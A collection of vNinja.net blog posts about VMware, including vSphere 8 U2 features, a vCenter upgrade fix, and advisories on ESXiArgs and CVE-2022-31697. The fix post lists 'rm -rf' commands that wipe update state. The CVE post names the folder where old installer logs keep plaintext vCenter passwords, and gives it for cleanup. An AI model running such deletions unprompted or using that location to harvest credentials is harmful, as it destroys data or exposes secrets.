U2!. At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSphere 8 U2 — What’s new # Like with vSAN 8 U2, there are really no new stand-out features in the vSphere 8 U2 announcement. It is an evolutionary release, with a number of welcome improvements both to hardware support and sane defaults for security and hardening, but no eyepopping new features. I do appreciate everything that makes certificate management easier though, so I’m glad to see improvements there. Here’s a quick rundown of the improvements in vSphere 8 U2 # vSphere+ # vCenter Lifecycle Management Now available with Free Trial Test Upgrades for cloud-connected environments Upgrade of vCenter Instances in vCenter HA mode is now supported One-time configuration Supports vCenter HA instances deployed using automated configuration Global Subscription Usage reports Overall subscription usage Actual vs billable Commitments, unused cores, overage and more. ESXi Lifecycle as a Service (vSphere+ Early Access) Create ESXi image definitions and apply to multiple clusters and across vCenters Rollout upgrades to one or more clusters from a single interface Monitor upgrade process using a cloud dashboard Update vCenter with Minimal Downtime # Reduced Downtime Upgrade for on-premises deployments Migration-based upgrade New vCenter appliance deployed Downtime only during switchover (~5 minutes) Resilient vCenter Patching # Prompt to take a vCenter backup before patching Automatic LVM snapshot taken during patching Patching can be resumed on failure or rolled back Non-Disruptive Certificate Management # Renew or replace vCenter Server certificates without service restart No need to schedule downtime May require other systems to reauthenticate or re-accept Reliable Network Configuration Recovery # vSphere Distributed Switch changes pushed from cluster(s) to vCenter Supports vSphere Distributed Switch using VMware NSX vSphere Identity Federation with Entra ID/Azure AD # Microsoft Entra ID/Azure AD added to direct Federation options All other identity choices still available vSphere Security Configuration & Hardening # Updated product defaults mean out-of-box protections Updated hardening guidance to reflect changes in the security landscape Lifecycle Managing vSAN Clusters with enhanced vSAN Witness Support # vSphere Lifecycle Manager can manage the image of vSAN witness nodes independent of the vSAN cluster Supports shared vSAN witness nodes End to End Desired State Configuration Management # End to end UI workflows Edit and apply configuration Streamlined Windows Guest Customization # Active Directory OU path can be specified during Windows guest customization Descriptive Error Messages when Files are Locked # Easily identify the source of locked VM files from the vSphere Client. No need to run CLI commands or review busy logs IP Address and MAC of the host holding the file lock is reported Improved Placement for GPU Workloads # DRS makes smarter placement decisions for vGPU enabled VMs vGPU enabled VMs are automatically migrated to accommodate larger VMs Quality of Service for GPU Workloads # Estimated stun time calculated based on assigned vGPU profile Administrators can define max acceptable stun time Virtual Machine Hardware Version 21 # 16 vGPU devices per VM 256 Disks per VM (64 disks x 4 vNVMe adapters) NVMe 1.3 support for Windows 11 and Windows Server 2022 Support WSFC using NVMe adapters RHEL 10 / Oracle Linux 10 / Debian 13 / FreeBSD 15 Streamlining Supervisor Cluster Deployments # Export Supervisor configuration Import to streamline new Supervisor deployments Clone Supervisor Configuration to new cluster Expanding NSX Advanced Load Balancer Support # NSX Advanced Load Balancer supported in NSX based Supervisor Clusters. Greenfield Supervisor Clusters Introducing Windows VM support for VM Service # VM Service compatible with Windows based templates Transport type Sysprep used for customization Self-Service VM Image Registry # DevOps users manage content library items using kubectl DevOps users publish new items to the library Content Libraries shared between namespaces or individual Read and write permissions defined per namespace --- # iOS VPN Connection Toggle Shortcut URL: https://vNinja.net/2023/07/17/ios-shortcut-toggle-vpn/ Date: 2023-07-17 Author: christian Tags: iOS, iPhone, MacOS I have probably been living under a rock for quite some time, but it turns out iOS Shortcuts (and MacOS) are pretty awesome, once you identify a proper use case for them. For me, the use case was simplifying connecting to my home, or work lab, network, via VPN. Now, I am pretty sure I have looked into how to do this years ago, without finding a solution, but in case someone else might benefit from it, here is a walkthrough of creating a simple VPN toggle button on your iOS homescreen, i.e no more diving into settings to connect. 1. Toggle VPN connection Shortcut Button or Widget # For some reason iOS does not provide a native VPN widget, or a way of quickly toggling a VPN connection without navigating into settings. Luckily iOS Shortcuts provide a way of doing that, which works very well. I have tested this for both “native” L2TP VPN connections, and Wireguard connections. How to configure a VPN Toggle button on iOS # Open the Shortcuts app and tap the “+” button in the upper-right corner. Tap the arrow besides “New Shortcut", and select Rename and put in whatever you want to call it. I used “Toggle VPN (vpn name)”. Tap on “Add Action” and search for “Set VPN” By default the action for the Shortcut is “Connect”, which will connect to a VPN. In this case, I wanted a toggle switch to either connect or disconnect a VPN connection. Change this by tapping on “Connect” and change it to “Toggle”. Tap on VPN to select which connection you want to use. Tap the arrow besides your shortcut name again and select “Add to Home Screen”. This brings up a preview of the icon selected and name for the Shortcut. To add it to your home screen, tap on “Add” in the top right hand corner. This adds the new toggle shortcut to your home screen, and it should now work like this: A simple click to toggle the VPN connection. Nice! --- # VMUG TechX 300 Here I Come! URL: https://vNinja.net/2023/06/27/techx-300-here-i-come/ Date: 2023-06-27 Author: christian Tags: Speaking, TechX300, VMUG September 20th - 21st 2023 VMUG Denmark is hosting TechX 300 which, in their own words is “the ultimate technical summit for enthusiasts seeking a deep dive into VMware solutions”: TechX 300 – Powered by VMUGDK This is the ultimate technical summit for enthusiasts seeking a deep dive into VMware solutions. We are hosting a Level 300 deep technical event in Copenhagen for IT professionals, system administrators, and other technology enthusiasts. Get ready to elevate your expertise and shape the future of virtualization at TechX 300! This will be a hardcore technical event hosted by hardcore techies for hardcore techies. We consider this to be an extension of VMware Explore and we focus on creating the opportunities needed to interact with speakers and engineers in the Breakout, Lightning, and Community sessions, as well as at Meet-the-Experts, in smaller group discussions, in the Solution Exchange, and during the overall event. Register for TechX 300 Now! I am very happy to announce that I’ve been accepted as a speaker for the event! My talk is called Down the Rabbit Hole with VMware Aria Automation Config (SaltStack), and I guess it’s time I start building my whole mad scientist lab environment for the live demos I plan on running. Thankfully I still have time to work it all out before the conference. I’m honored to have been selected again, as I also had speaking slots at VMUG Nordic UserCon in 2015 and 2019. Seems like every four years is a pattern! A few days in Copenhagen is never wrong, combining it with an awesome event with a number of fantastic speakers (and me) makes it even better. I can’t wait! --- # IT Architect Series: Stories From the Field, Volume 2 URL: https://vNinja.net/2023/05/19/it-architect-series-stories-from-the-field-vol2/ Date: 2023-05-19 Author: christian Tags: Recommended, Reading, Books Another book in IT Architect series has finally been released: IT Architect Series: Stories from the Field, Volume 2 This is the follow up to Volume 1, which was released back in 2020. I have had the privilege of making a chapter contribution to this second volume, just as I did for the first one, joining an all star list of seasoned IT-professionals. Dont just take my word for it though, listen to Steve I'm helping to edit "IT Architect Series: Stories from the Field Vol2" this weekend (@vcdx001 & @MarkGabbs). Fascinating lessons learned along these lines from some of the world's best IT architects. — Steven Kaplan (@ROIdude) November 19, 2022 Order your copy today! — I can’t wait to get my hands on a physical copy of it! And who knows, perhaps there’s even a Volume 3 in the works? Book Details # Pages: 233 Synopsis # What is it like to be engaged on an IT project when it turns into a horror story?! Volume 2 continues with more stories from leading IT Professionals who describe their most challenging Datacenter projects and provide insights into why failures occurred, including lessons learned and what they would do differently. Recommended reading for members of the IT Community who deliver solutions in the field and want to avoid learning the hard way Table Of Contents # My Lessons in ROI A Cut Too Far Assumptions to the Rescue Assumptions are the Root of All Evil A Flip of the Switch If You Do Not Ask, You Do Not Get Father Time Stakeholders, Requirements, and the Project Confidence Is Key Stand by Your Team Is Your Cloud White, Black, or Gray? Holy Grail – What a Fail! None of Their Business Alignment, Cooperation, and Evaluation Sometimes Compression Matters When the Levee Breaks Design by License Admitting Defeat Chasing a Unicorn The Perils of Overselling The Greener Grass of Greenfield? Purpose and Scope Observe, Learn, and Say Something Stories from the Field: Retrospective IT Architect Series and Other Works About the Editors and the Artist Authors and Contributors # Editor-in-chief: Matthew Wood Managing editor: John Arrasjid Selected by: Mark Gabryjelski Foreword by: Steve Kaplan Cover design or artwork by: Ioannis Authors: Abdullah Abdullah, Chris Noon, Chris Porter, Christian Mohn, Dave Cook, Doug Baer, Faisal Hasan, Graham Barker, , Jason Yao, Jeffrey Kusters, Joe Clarke, John Arrasjid, Matthew Wood, Matthieu Braga, Marco Lopez, Mark Gabryjelski, Michael Francis, Paul Cradduck, Phoebe Kim, Russell Pope, Sachin Dharmadhikari, Steve Kaplan, Tony Foster, Wesley Geelhoed, Yves Sandfort. --- # Upgrading to vCenter 8 Update 1: Invalid Type, expected String, instead got NoneType URL: https://vNinja.net/2023/04/19/upgrading-vcenter8-invalid-type/ Date: 2023-04-19 Author: christian Tags: vSphere, vCenter, VMware vCenter 8.0 Update 1 was released on April 18th, and I quickly jumped to upgrading my existing home lab vCenter, but ran into an issue that prevented the upgrade from completing, namely the error message “Invalid Type, expected String, instead got NoneType”. Obviously something was wrong with my current vCenter installation, but finding out what was required to correct it wasn’t straight forward. Thanks to my partner in crime, and notorious human log file parser, Espen Ødegaard, I found the following in /var/log/vmware/applmgmt/PatchRunner.log: 2023-04-19T09:10:39.560Z vpxd:Expand ERROR vmware_b2b.patching.executor.hook_executor Patch hook 'vpxd:Expand' failed. (...) Traceback (most recent call last): xml.etree.ElementTree.ParseError: not well-formed (invalid token): line 40, column 7 Note: The log output has been truncated for legibility. Clearly something is not conformant in the vpxd.cfg file on my vCenter, on line 40. Opening /etc/vmware-vpx/vpxd.cfg showed the following: 38 <vcls> 39 <clusters> 40 <78ed4e3c-4f28-4d27-a0d5-01182e957269> 41 <enabled>true</enabled> 42 </78ed4e3c-4f28-4d27-a0d5-01182e957269> 43 </clusters> 44 </vcls> This is not correct, it should be referencing <domain-id> and not an UUID on line 40/42. It seems I have messed up the procedure for cleaning up vCLS VMs at some point, putting in the wrong configuration as a vCenter Advanced setting. Check Putting a Cluster in Retreat Mode for the correct procedure and how to obtain the correct domain-id I tried cleaning this up via the vCenter Web Client, but could not find the config.vcls.clusters.domain-c(number).enabled configuration parameter at all, even when searching for only cls. Manually cleaning up vpxd.cfg did the trick though, correcting the configuration to the correct settings: 38 <vcls> 39 <clusters> 40 <domain-c59002> 41 <enabled>true</enabled> 42 </domain-c59002> 43 </clusters> 44 </vcls> Once this was fixed, I restarted the vCenter appliance and restarted the upgrade process, but since there was a failed upgrade attempt already I had to clean up the failed upgrade state by running the following via SSH on the vCenter appliance: service-control --stop applmgmt rm -rf /storage/core/software-update/updates/* rm -rf /storage/core/software-update/stage/* rm -rf /storage/db/patching.db mv /storage/core/software-packages/staged-configuration.json /storage/core mv /etc/applmgmt/appliance/software_update_state.conf /storage/core service-control --start applmgmt Ref: vCenter Server update fails with error “Installation failed - Install in progress - You have reached maximum number of retries to resume the patching. Please restore the vCenter using the backup.” (87238). Once that step was performed, a new upgrade attempt was performed, this time with a successful result! Obviously putting wrong configuration settings in either via vCenter Advanced Parameters or directly via editing vpxd.cfg can get you into trouble, and should be avoided if possible in production environments — Especially if you mess them up. --- # Are Your (old) ESXi Hosts Publicly Available? — They won't be for long. URL: https://vNinja.net/2023/02/06/are-your-esxi-hosts-publicly-available/ Date: 2023-02-06 Author: christian Tags: vCenter, VMware, ESXi Back in February 2021, I published a post named Is Your VMware vCenter Publicly Available?. It is February 2023, and here we are again. A new widespread ransomware attack dubbed ESXiArgs is targeting publicly available ESXi hosts, using a vulnerability that was patched two years ago (CVE-2021-21947) . For details, see Massive ESXiArgs ransomware attack targets VMware ESXi servers worldwide. You really don’t want to wake up some day and see that your ESXi HTML Client has been replaced by a static web page, showing you how to pay the ransom… For now it seems to be contained to publicly available ESXi hosts, but remember, the same tecnique and vulnarability is also available on the inside of your perimiter firewall, so any internal client that can access your hosts could potentially be an attacker as well. Lessons to be learned here? # Don’t expose vCenter or ESXi hosts to the internet. No exceptions (except Honeypots of course) Ensure admin access (vCenter, ESXi and other management interfaces/APIs) is limited to clients that need it and is properly secured (think Zero Trust, MultiFactor Authentication etc.) Patch your stuff. To quote myself from two years ago: To be blunt; there is simply no valid reason why your VMware vCenter, or ESXi hosts, should be available over the internet, none what so ever. In fact, it shouldn’t even be available from non-admin clients in your local network, let alone via the internet. If that is the case in your environment, odds are that there are probably other big issues present in your infrastructure as well. --- # VMware Explore 2023 Dates and Venues URL: https://vNinja.net/2023/01/06/vmware-explore-2023/ Date: 2023-01-06 Author: christian Tags: VMware, VMware Explore, Explore Update 5. jan 2023: The dates and location for US and EMEA hs now been made official by VMware at vmware.com/explore/. Some unofficial dates and details for VMware Explore 2023 has come to light, and by the looks of things the rumors of moving the US version from San Francisco to Las Vegas are true. It also seems like the EMEA conference will yet again be held in Barcelona. Unconfirmed VMware Explore 2023 Details # Geo Date Location Korea april 6 - 7 unknown location India april 11 - 12 unknown location US august 21 - 24 The Venetian Convention and Expo Center in Las Vegas EMEA november 6 - 9 Fira Barcelona Gran Via in Barcelona Get planning and approval processes for travel started! --- # My Experience: VCP-DCV for vSphere 7.x 2V0-21.20 Exam URL: https://vNinja.net/2023/01/04/vcp-dcv-vsphere7-2v0-21.20/ Date: 2023-01-04 Author: stine Tags: VMware, Certification, VCP I knew one thing was going to change when I transitioned from being an operations engineer and became a consultant: the fact that I had rarely done any kind of certification. Trying to figure out what certification I should start with was a daunting prospect, but luckily, I could ask Christian Mohn, and we decided I should start with VCP-DCV for vSphere 7.x (VCP for short). It’s described by VMware as “The VCP-DCV 2022 certification validates candidate skills to implement, manage, and troubleshoot a vSphere infrastructure, using best practices to provide a powerful, flexible, and secure foundation for business agility that can accelerate the transformation to cloud computing.”, and sounds like a good place to start to showcase that you are generally skilled when it comes to working with VMware. I started on the course VMware vSphere: Install, Configure, Manage [V7] and even though I had worked with multiple VMware products for years I learned a lot. This was also the first VMware course I had taken, and I was so happy that my colleagues told me I could set the speed up to 2X. After the course was done, I did a lot of the tests, read through the course material and thought I would be set for the VCP exam. The exam is 70 questions in a mix of single and multiple choice answers, the duration is 130 minutes and the passing score is 300. My first attempt at the exam did not go well. I somehow thought I would ace it just because I had worked with VMware for so long. I was running a fever but instead of postponing I felt sure it would be no problem. Needless to say, I failed. The exam is structured on the assumption that you are experienced in VMware products generally, so you are bound to get questions on things you have never worked on or thought about before. There were also a lot of answers that I had to cram for. For example, in my day-to-day work I rarely had to calculate CPU shares and percentages, but after cramming how to do this it made a lot of the questions easier to calculate. I was determined to not fail again so I started reading up on study guides. Christian mentioned the VCP-DCV for vSphere 7.x (Exam 2V0-21.20) Official Cert Guide and I immediately started reading it — In my opinion this is the superior study guide of all the ones I was using. I also found out that with the study guide you get access to practice exams on the Pearson site: pearsontestprep.com. This is going to sound like a sponsored article, but I cannot say how much the Pearson practice exams helped me. I bought the book first via Amazon and got a hold of the normal practice test, but I then I bought the premium edition, and it links to the eBook. Whenever I answered a question wrong it immediately points you to the PDF of the eBook and the chapter you should reread. This was extremely helpful and made studying for the exam so much easier. When I felt like I were acing the practice exams I set a date to retake the VCP exam. One thing I can’t stress enough is that if you are taking the exam from home, you should take the pre-exam test of your equipment several times before the exam. I had done mine, but a change in the company’s antivirus program suddenly stopped the exam program from working and it made the actual exam day very stressful. Clean your desk and make sure the room you are taking the exam in is tidy. You must take pictures of the room from several angles beforehand. There is a person watching you take the exam from your webcam. When I was taking the exam, I was asked to show my desk on several occasions. When I had gone through all my questions, I submitted my answers, and I was so happy to see that I had passed! I even got a physical pin at VMware Explore to prove it! In conclusion I would recommend everyone that is planning on taking the VCP-DCV to prepare using the Pearson prep test and eBook or follow and read everything mentioned in the prep guide. --- # CloudBytes Podcast — Season 3 URL: https://vNinja.net/2022/12/22/cloudbytes-season-3/ Date: 2022-12-22 Author: christian Tags: Podcast, CloudBytes The CloudBytes Podcast recently released Season 3 of their series of podcasts. The main topic this season is core components of cybersecurity, and I was lucky enough to be asked to be a guest on no less than two of the episodes: Season 3: Incident Response # Episode Summary # 11:11 Systems Director of Product Market Intelligence Brian Knudtson is joined by guests Jason Carrier, Richard Kenyan, and Christian Mohn for a conversation about the keys to an effective Incident Response plan. They discuss the importance of good communications, how to handle cloud providers, and some of the best and worst examples. This communication needs to be intentional and, once communication paths are defined and tested, the plan should be iterated on constantly. Season 3: Malware Defense # Episode Summary # 11:11 Systems of Cloud Market Intelligence Brian Knudtson is joined by guests Steve Broeder, Allan Liska, and Christian Mohn for a conversation about malware. Are cyber-criminals still lurking around each corner ready to infect your endpoints with ransomware, or are there new actors in the threat landscape? Should corporate IT still be in charge of security? We also discuss the importance of constant vigilance and DR plans. Find the episodes wherever you listen to your podcasts (they are released weekly), or check out the entire series in one go. There are loads of great guests, topics and really good conversations here, and I’m honored to have been asked to participate. --- # Leveling Up: My First VMUG Presentation URL: https://vNinja.net/2022/12/22/leveling-up-my-first-vmug-presentation/ Date: 2022-12-22 Author: stine Tags: VMware, VMUG I’ve been a member of VMUG for years now and I’ve always looked up to the people organizing it. I got asked to hold a short presentation for Norway VMUG in November and I was so honored. Then the nerves started! What should I talk about? Could I be interesting? Am I good enough? Impostor syndrome was doing a number on me, but I was adamant that I would get over this. I had always secretly wanted to speak at VMUG and now was my chance. I’ve never had a problem talking to crowds of people that I already know, but this would be in front of a lot of people I’ve never seen before, both physically in Oslo but also streamed to two other cities in Norway; Bergen and Trondheim. We were also having a guest speaker Amanda Blevins joining us from another country. A quick pep talk from my colleagues in Proact and VMUG leaders and I was convinced. I was going to have a presentation about my first trip to VMware Explore. During the week in Barcelona I took notes and pictures to prepare for the presentation. It was fun to constantly think could this be funny or interesting to talk about during my presentation. The best picture was taken at the vRockstar event of Christian, Brad Tompkins (the CEO of VMUG) and me. Christian and I had not coordinated our outfits, I promise. I got home and started working on my presentation. I wanted it to be a mix of tips, experiences and a whole lot of humor. I also wrote a blog post about the subject: My First VMware Explore I spent several hours during Explore and the two weeks after constantly writing and changing my slide deck. I also tried to hold the presentation in front of the mirror countless times. Two weeks after Explore the day had come and I was going to hold my presentation. We started the event off with some pizza and mingling. I met some people I’ve never met before, and we talked a lot about shared experiences and what we currently work on. That’s in my opinion one of the best things about VMUG meetings, the chance to meet likeminded people that work with different parts of the same product. The amazingly talented Amanda Blevins talked about Multi-Cloud Services. My brilliant co-workers Rudi Martinsen and Christian Mohn talked about news from VMware Explore. After that it was my turn. I’m not going to lie; I was very nervous and don’t really remember much about it. But what I do remember is how sweet everyone was both before and after I was speaking. VMUG really is a very including community and if you ever get asked to you should definitely do it. I really hope I get asked to present again, in fact I’m certain I’ll send in some session ideas going forward. In the meantime, I’ll continue being an active member of the community, and contribute what I can — especially cheering on new speakers. It might be daunting, at first, but it’s also very rewarding. --- # VMware vCenter CVE-2022-31697 URL: https://vNinja.net/2022/12/20/vmware-vcenter-cve-2022-31697/ Date: 2022-12-20 Author: christian Tags: vSphere, vCenter, VMware VMware has released security advisory VMSA-2022-0030 which includes several vulnerabilities: CVE-2022-31696, CVE-2022-31697, CVE-2022-31698, CVE-2022-31699 Among these CVE-2022-31697 caught my eye as a potential issue in many environments. The vCenter Server contains an information disclosure vulnerability due to the logging of credentials in plaintext. A malicious actor with access to a workstation that invoked a vCenter Server Appliance ISO operation (Install/Upgrade/Migrate/Restore) can access plaintext passwords used during that operation. This means that any workstation in your environment that has run a vCenter Server Install, Upgrade, Migrate og Restore operation probably has plaintext credentials for vCenter lying around on the local disk. As we all know most ransom-/malware scans file systems for credentials before wrecking havoc in an environment, and cleartext credentials like this are easy to automatically find and pick up for later exploitation. For Windows operating systems, these files are located in %AppData%\Roaming\vcsa-ui-installer. I have not verified the location of those files on Mac or Linux operating systems yet, and frankly VMware should have disclosed those locations in the CVE or a KB. Ensure that these files are deleted from all workstations that have been used to upgrade your vSphere environment the last few years. This also means the plaintext logs might be replicated to file servers and backed up/replicated elsewhere, so now might be a good time to change your administrator@vsphere.local password, even if you are running on a version that has been patched. These log files have been around since at least vCenter 6.5. The advisory is valid for the following versions: Product Version vCenter Server 7.0 vCenter Server 6.7 vCenter Server 6.5 Note that vCenter 8.0 is not included. My Thoughts # I really wish VMware had been clearer in their recommendations in this advisory. At the very least the location of the files/logs with plaintext passwords should have been disclosed, to make cleanup from older versions easier for admins to search for in their environment. Given the average dwell time for ransomware before actually doing harm, odds are that the passwords in these files are already compromised. While it is virtually impossible for VMware to clean this up retroactively, detailing proper cleanup procedures for residual files should really be the minimum effort here. Highlighting the possible need to change passwords should also have been included in the advisory. Simply patching the vCenter instance with a new version does not fix the issue in this case, as the credentials leakage comes from previous versions of the installer. Thus passwords might be stored in log files from older non-patched versions on workstations in your environment, even on workstations no-one remembers running an install from back when the vCenter 6.7 appliance was released in 2018 (and if you haven’t changed the administrator password since then, it’s obviously time to do it now). In my mind, a KB should have been issued with the CVE, highlighting the locations of the logs in question, the likely need for password rotation and the actual real world ramifications of the issue. --- # vSAN 8 ESA VMware Compatibility Guidance URL: https://vNinja.net/2022/12/07/vsan8-esa-vmware-compatibility-guidance/ Date: 2022-12-07 Author: christian Tags: vSphere, vSAN, VMware, ESXi VMware has just released a new KB90343: What You Can (and Cannot) Change in a vSAN ESA ReadyNode™. For those looking to utilize the new vSAN 8 Express Storage Architecture (ESA) this is a great resource that outlines what components in a vSAN ESA ReadyNode™ can be changed. As outlined in KB90343 both CPU, Memory, Storage Device, NIC and Boot Device can all be changed from the defaults — check the KB for details. The vSAN ESA VCG is also available, albeit with a small number for vendors for the time being. The KB also includes a very handy vSAN ESA ReadyNode™ FAQ which includes advice specific device requirements and minimum network requirements. An updated vSAN Sizer that supports ESA is also under development, and should be available soon. --- # My First VMware Explore URL: https://vNinja.net/2022/12/02/my-first-vmware-explore/ Date: 2022-12-02 Author: stine Tags: VMware, VMware Explore, Explore, Barcelona Weirdly I have worked mainly with VMware products for years now without having the pleasure to go to VMware Explore. This year that was about to change and I was so excited! I was heading from the cold weather of Norway to sunny Barcelona to attend VMware Explore Europe and I could hardly wait. I have written down a little recap of my trip, with some tips and tricks for other people that might have not gone to Explore before. Firstly, I should mention that this conference was a tad crowded this year. From what I heard a lot of people registered late so the conference had been scaled down and that meant that there were some space issues. In fact the first day I was worried we’d have a Woodstock 99 situation but luckily, I was proved wrong by all the wonderful people that met up and shared a great week together even if it was packed. Here are some tips I gathered through my first Explore and how I got to them: Book early # One thing I wasn’t aware of beforehand was how quickly you had to book sessions. My colleague tipped me off that the sessions were already filling up and I didn’t even realize that you had to book anything. I rushed onto the site and managed to book a lot of stuff and felt pleased with myself. Don’t overplan # This however brings me to the next thing I didn’t know about big conferences like this; planning too much is never a good idea. One thing is that it’s difficult to retain so much information and keep your concentration up for so many hours, but another thing is you won’t have time to get from one session to another in that short amount of time. The conference is big, so you end up walking loads. Wear good shoes and take breaks often # Speaking of walking loads, you should bring some good shoes with you. The venue this year was big, and I can’t imagine that changing anytime soon. I averaged about 10,000 steps at the venue every day. Another important thing is to take breaks with colleagues or on your own. There are a lot of places you can grab some drinks, food or just sit in the sun. The days end up being long and you have a lot of cool stuff on your mind hopefully so it’s important to take some time to chill. Wherever you are going, get there early # I arrived early this year and went to Explore one day before it officially starts, but the backpacks with shirts were already down to small and extra small sizes. When the keynote was starting the first day, I was pleased to get to the venue quite early, but most seats were taken already. Luckily, I found a chair at what turned out to be my favorite area; VMware Communities and {code}. The visibility left a little to be desired, but the energy in the room was amazing. Later that day I headed to the vendor area, and I got introduced to the vast amounts of merchandise from different vendors. Wherever the longest queue is where you will find the best free merch. Bring your backpack, you’ll probably end up with quite a bit of free stuff in the end. Sessions # As mentioned before, loads of the sessions were booked out early, but if you get to the hall a bit early you can stand in line to get in if there are some free places. Places like “VMware Communities and {code}” have smaller sessions that you can just meet up and join without booking beforehand. Here’s a link to their content vBrownbag 2022 VMware Explore TechTalks. My absolute favorite session was “Meet the experts” where I got to talk to William Lam and Dave Morera about the new features in vSphere 8 in a small group of people. Social events # There are so many events and parties planned during Explore from huge parties arranged by vendors to small gatherings planned by participants. From all the events I attended, the best ones turned out to be the chill evenings with my colleagues just chatting in the hotel bar. And this brings me to the end of my recap and experience of VMware Explore. It was an excellent conference and I really hope I get to go back next year! --- # VMware vSAN 8 ESA in my Homelab URL: https://vNinja.net/2022/11/24/vsan8-esa-in-homelab/ Date: 2022-11-24 Author: christian Tags: vSphere, vSAN, VMware, ESXi Ever since vSAN 8 was announced, I’ve been waiting to try out the new Express Storage Architecture in my HomeLab, especially since the internal storage in my hosts is NVMe only. #vSphere 8 with new USB NIC Fling version 1.11 looking good in my HomeLab. Rest of this cluster to do tomorrow, and vSAN ESA here we come! #vExpert #VMwarehttps://t.co/1GmB4bHlHG pic.twitter.com/RZNAmJhJcl — Christian Mohn™ (@h0bbel) November 23, 2022 Yesterday the last piece of the puzzle was released, namely the new USB Network Native Driver v1.11 for ESXi 8 which I needed before reinstalling my hosts in order to get vSAN traffic isolation. Armed with the new USB NIC drivers, I reinstalled my three of my four hosts with ESXi 8 and then manually installed the USB NIC drivers. One of the reasons I wanted to do a reinstall, was to get rid of the external USB connected SSD boot medium I have used since the lab was set up. One of the problems I had with running vSAN 7 in this environment, was that on two of the hosts I have, the device used as a cache device for vSAN, randomly went offline under heavy load. The device just went AWOL, until the host was rebooted and then it was OK again, until the next time. At the same time, I moved all my vSAN traffic out from my 1 GbE switch, and over to a new QNAP QSW-1108-8T 8-Port 2.5Gbps Unmanaged Switch. The new networking setup, and switch, is dedicated to vSAN and vMotion traffic through a new a VDS, with one Port Group for each traffic type, and with two uplinks. Uplink 1 is configured as the active uplink for the vMotion PG with Uplink 2 as a Standby Uplink, and the reverse setup for vSAN traffic. This networking tweak means I do not need to use VLANs for the vMotion and vSAN traffic anymore (the new switch doesn’t support it anyway), as well as a throughput increase from 1 GbE to 2.5 GbE at the same time. I have four hosts in total, so this little 8-port switch now gets a run for it’s money (and it does run a bit hot, it seems) The last host was then reinstalled, and I decided to try out using vSphere Lifecycle Manager to create an Image containing the USB NIC fling and use then remediate the host, which also worked out perfectly. Once the hosts were installed and configured, it was time to enable vSAN and try out the new Express Storage Architecture. vSAN ESA is configured in the same way as the traditional OSA version, you just select that you want ESA at configuration time. Configuring vSAN 8 ESA # Selecting ESA is just a little tick box, and off it goes. As shown in the screenshot above, my NVMe devices are listed as incompatible (eg. not on the HCL), but that doesn’t stop the configuration from going forward. I manually claimed the disks, and continued the setup. I didn’t configure any custom fault domains, and moved on to the review screen A few minutes later, I have a brand new vSAN 8 ESA up and running! Skyline Health complains about the unsupported NVMe devices and the network throughput, but that’s to be expected. Of course, this setup is very much unsupported by VMware. The USB NIC’s I use are not supported, thankfully the USB NIC Fling is available, but it’s not intended for production use. vSAN ESA also has a recommended minimum network rate of 25 GbE, and not 2.5 GbE as I’m running. The NVMe devices I use are not on the vSAN ESA HCL or VCG, and to top it off, vSAN ESA also requires a minimum of 4 NVMe devices per host — I have one. So, while this setup works, it is very much a home lab setup. So there it is, my completely unsupported vSAN 8 ESA configuration*. --- # VMware Explore Europe 2022: My Immediate Thoughts URL: https://vNinja.net/2022/11/11/vmware-explore-europe-2022-my-thougths/ Date: 2022-11-11 Author: christian Tags: VMware, VMware Explore, Explore, Barcelona This week was the return of VMworld, post-pandemicly renamed to VMware Explore, in Europe. As has been the case for several years now, it was held in the Fira Gran Via in Barcelona. This years theme was Multi Cloud, and going from Cloud Chaos to Cloud Smart, but one of the other main things customers seems focused on in Europe is Sovereign Cloud. I guess this is a bigger focus in Europe than it is in the US, especially since there are different regulations in place here, and many customer span several regions. Of course, there was other news as well, which I plan on covering in future posts. The good # As far as going back to physical events goes; finally! We have all been waiting for this, and while video and online content is good, nothing beats meeting up in person (perhaps not including “barefoot guy”, who probably should have stayed at home). People absolutely seem ready for physical events again, the energy and buzz at the venue was fantastic — According to people that also attended the US event, the event was much more up-beat, with more energy and enthusiasm, and the questions both in the sessions and on the Expo floor was of a more technical nature. Way to go Europe! I also had the chance to have some excellent customer meetings, with VMware representatives, at the event. This is an invaluable resource, and getting customers in front of Program Managers and technical resources from VMware is always a good thing. As I’ve said on many occasions before, this is where I find real value in these events. Meeting my friends in the industry, making new connections, and also introducting my customers to the right people in order to create joint value. The bad # That being said, I have a feeling that VMware misjudged the attendance level this year. It may be due to a “hockey stick” growth in attendees, but when you run out of backpacks on Monday (and the conference doesn’t really start until Tuesday), something is off. The same goes for the General Session on Tuesday, when there simply wasn’t enough room to hold everyone who wanted to view it live, even if it was streamed online simultaneously. The venue seemed undersized for the attendance numbers, while at the same time being almost too large to walk around effectively. The Expo floor was sized well, but the rest was a problem. The hot lunch area was too small, and ineffective. The whole area felt big, but at the same time cramped and off-kilter. Session rooms were to small too, causing long queues as well as lots of people not getting into the sessions they wanted to attend. Even if some sessions where repeated, some even three times, there were still lines of people trying to get in. The VMware Communities and {code} area was also undersized, with too few blogger/community tables and chairs, and with the theatre so close, it was almost impossible to have a proper conversation there. Kudos to vBrownbag who had a seemingly endlesss stream of content, but going forward there should probably be more space available in that area. It was fantastic to be able to actually meet people again, have a quick chat. Some of the people I’ve met this week I haven’t seen in years, and even if we only got a chance to spend 5 minutes talking during the week, it was great being able to do so again. VMware Explore, now what? # There are no official numbers yet, at least not that I’ve seen, but rumor has it that 2022 was the year that the European event eclipsed the attendee numbers for the US one. If not, it’s going to be very close. Details for VMware Explore 2023 has not been announced yet, so we’re all waiting for details on what’s up for 2023. Based on this years event, I can’t envision it going back to virtual only again after this. Conclusion # All in all; An awesome event. It was as the good old days where back, meeting people in the flesh again. The energy of the event was great, and I can’t wait until next time! I’ll chaulk all the problems listed above down to attendee numbers being a post-pandemic surprise, and cross my fingers that it will be fixed for future events. After seeing this years event, I’m sure Hock E. Tan and Broadcom has been paying attention as well. Oh, and I’ve had enough cerveza, jamon and tapas to last, well, just about a year or so. Step Count: 75432 Kilometers: 53.3 Exhausted: True Here’s a small video I created at the event # --- # VMware vSAN 8 Announced — New Architecture Model! URL: https://vNinja.net/2022/08/30/vmware-vsan8-announced/ Date: 2022-08-30 Author: christian Tags: vSphere, vSAN, VMware, ESXi Guess what? With vSphere 8 comes vSAN 8, and with it a slew of improvements and even a brand new architecture option! This new optional next generation architecture is built into vSAN 8, and going forward customers can choose which architecture to deploy: vSAN Original Storage Architecture (OSA) vSAN Express Storage Architecture (ESA) vSAN Original Storage Architecture (OSA) # This is the traditional vSAN architecture we are already accustomed to, with dedicated cache and capacity drives making up Disk Groups that vSAN 